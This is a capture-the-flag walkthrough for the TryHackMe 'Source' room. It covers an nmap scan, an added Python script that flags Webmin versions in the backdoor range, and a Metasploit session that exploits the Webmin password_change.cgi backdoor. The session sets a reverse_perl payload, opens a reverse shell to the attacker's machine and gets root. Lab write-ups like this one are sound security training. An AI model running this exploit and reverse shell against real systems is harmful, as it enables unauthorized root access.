TryHackMe | Source
This is one (of many) walkthroughs for the Source CTF room. As always, I try to follow some simple enumeration steps to expose potential flaws, and this article documents them.
Enumeration
As usual, I use nmap to see which ports are open.
$ nmap -sCV $IP-ADDRESS
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-05 16:16 GMT
...
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
| 256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_ 256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (EdDSA)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-server-header: MiniServ/1.890
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 02:7D:26:D8:9A:85 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.15 seconds
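The scan above already contains the fact that decides this room: the banner on port 10000 names the exact Webmin (MiniServ) version. From a defender's side the same banner is what a vulnerability-management pipeline would key on. The script below is an added example, not code from the original post or from the Webmin or Metasploit projects: it parses nmap -sV output, pulls the MiniServ version out of the banner, and reports whether it falls in the version range affected by the password_change.cgi backdoor that the Metasploit module later in this page targets. The sample scan text is constructed from the page's own output (plus an invented patched host for the negative case), and the affected range (1.882 through 1.921) is an assumption taken from the Webmin project's public advisory; check it against the advisory before relying on it.

```python
"""Triage nmap -sV output for a Webmin MiniServ banner in an affected range.

Added example for this walkthrough; not part of the original post or of
any project. Assumptions are marked in comments.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the service lines from the page's scan. Script output
# lines (starting with '|') are included to show they are skipped.
SAMPLE_SCAN = (
    "PORT      STATE SERVICE VERSION\n"
    "22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n"
    "| ssh-hostkey:\n"
    "|   2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)\n"
    "10000/tcp open  http    MiniServ 1.890 (Webmin httpd)\n"
    "|_http-server-header: MiniServ/1.890\n"
)

# Constructed sample of a host outside the range (invented version number).
SAMPLE_SCAN_PATCHED = (
    "PORT      STATE SERVICE VERSION\n"
    "10000/tcp open  http    MiniServ 1.930 (Webmin httpd)\n"
)

# ASSUMPTION: affected range per the Webmin project's advisory for the
# password_change.cgi backdoor. Verify before use.
BACKDOOR_MIN = (1, 882)
BACKDOOR_MAX = (1, 921)

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
MINISERV = re.compile(r"MiniServ[ /](\d+)\.(\d+)")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


@dataclass
class Finding:
    port: int
    version: str
    affected: bool
    note: str


def parse_nmap(text: str) -> List[Service]:
    """Extract one Service per 'PORT/PROTO STATE SERVICE VERSION' line."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            services.append(Service(int(m.group(1)), m.group(2), m.group(3),
                                    m.group(4), m.group(5).strip()))
    return services


def parse_version(text: str) -> Tuple[int, int]:
    """Turn '1.890' into (1, 890). Webmin minors are three digits, so a
    short minor such as '1.9' is right-padded to keep ordering correct."""
    major, minor = text.split(".", 1)
    return int(major), int(minor.ljust(3, "0"))


def miniserv_version(version_field: str) -> Optional[str]:
    """Return the MiniServ version string from a banner, or None."""
    m = MINISERV.search(version_field)
    return f"{m.group(1)}.{m.group(2)}" if m else None


def triage(text: str) -> List[Finding]:
    """Report every MiniServ service and whether its version is in range."""
    findings = []
    for svc in parse_nmap(text):
        ver = miniserv_version(svc.version)
        if ver is None:
            continue
        in_range = BACKDOOR_MIN <= parse_version(ver) <= BACKDOOR_MAX
        note = ("version inside assumed backdoor range; confirm install source "
                "and patch" if in_range else "version outside assumed range")
        # Webmin normally serves TLS on 10000; nmap may still label it 'http'.
        if svc.name == "http":
            note += "; service labelled http, verify TLS is actually enforced"
        findings.append(Finding(svc.port, ver, in_range, note))
    return findings


if __name__ == "__main__":
    for label, scan in (("page scan", SAMPLE_SCAN), ("patched", SAMPLE_SCAN_PATCHED)):
        for f in triage(scan):
            print(f"{label}: port {f.port} MiniServ {f.version} "
                  f"affected={f.affected} ({f.note})")
```

Feeding it the page's scan flags port 10000 with MiniServ 1.890 as inside the range, which is exactly what the Metasploit check later in the walkthrough confirms; the invented 1.930 host is reported as outside it.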
Accessing the web server took me nowhere. It just told me to use another URL, because the server was running in SSL mode.
This web server is running in SSL mode. Try the URL https://ip-IP-ADDRESS.eu-west-1.compute.internal:10000/ instead.
The HTTPS URL showed a Webmin login page, but I had no credentials at that point.
As I had almost no information at my disposal, I searched for exploits for Webmin httpd, using Metasploit for the research.
# FROM THM VM
$ msfconsole
=[ metasploit v6.3.5-dev- ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 410 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
msf6 > search webmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
2 exploit/linux/http/webmin_file_manager_rce 2022-02-26 excellent Yes Webmin File Manager RCE
3 exploit/linux/http/webmin_package_updates_rce 2022-07-26 excellent Yes Webmin Package Updates RCE
4 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
5 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
6 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
7 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
From the above output, I could see several exploits for Webmin. As some of them required a password to run, and I didn’t have one, I ignored those for the time being. I tried the backdoor module as a way of bypassing authentication and accessing the server.
msf6 > use linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_backdoor) > show options
Module options (exploit/linux/http/webmin_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to Webmin
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
View the full module info with the info, or info -d command.
# set all required options
msf6 exploit(linux/http/webmin_backdoor) > set SSL true
msf6 exploit(linux/http/webmin_backdoor) > set RHOSTS IP-ADDRESS
msf6 exploit(linux/http/webmin_backdoor) > set LHOST THM-VM-IP-ADDRESS
After setting all the options required to run the module, I issued the exploit command and waited for the result.
msf6 exploit(linux/http/webmin_backdoor) > exploit
[*] Started reverse TCP handler on THM-VM-IP-ADDRESS:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened at 2023-03-05 16:42:16 +0000
which python
/usr/bin/python
# create a stable shell
python -c "import pty; pty.spawn('/bin/bash');"
root@source:/usr/share/webmin/# whoami
root
I was not expecting this! 😅 I was already root, so I could grab user.txt and root.txt straight away.
Conclusion
This CTF turned out a bit unexpected. Even though I used the magic of Metasploit to get a shell as root, I was curious about other ways to achieve the same result. Reading other writeups for this CTF, I was happy to see that they used the same approach to reach the same goal. Kudos to DarkStar7471 for creating this one! 👍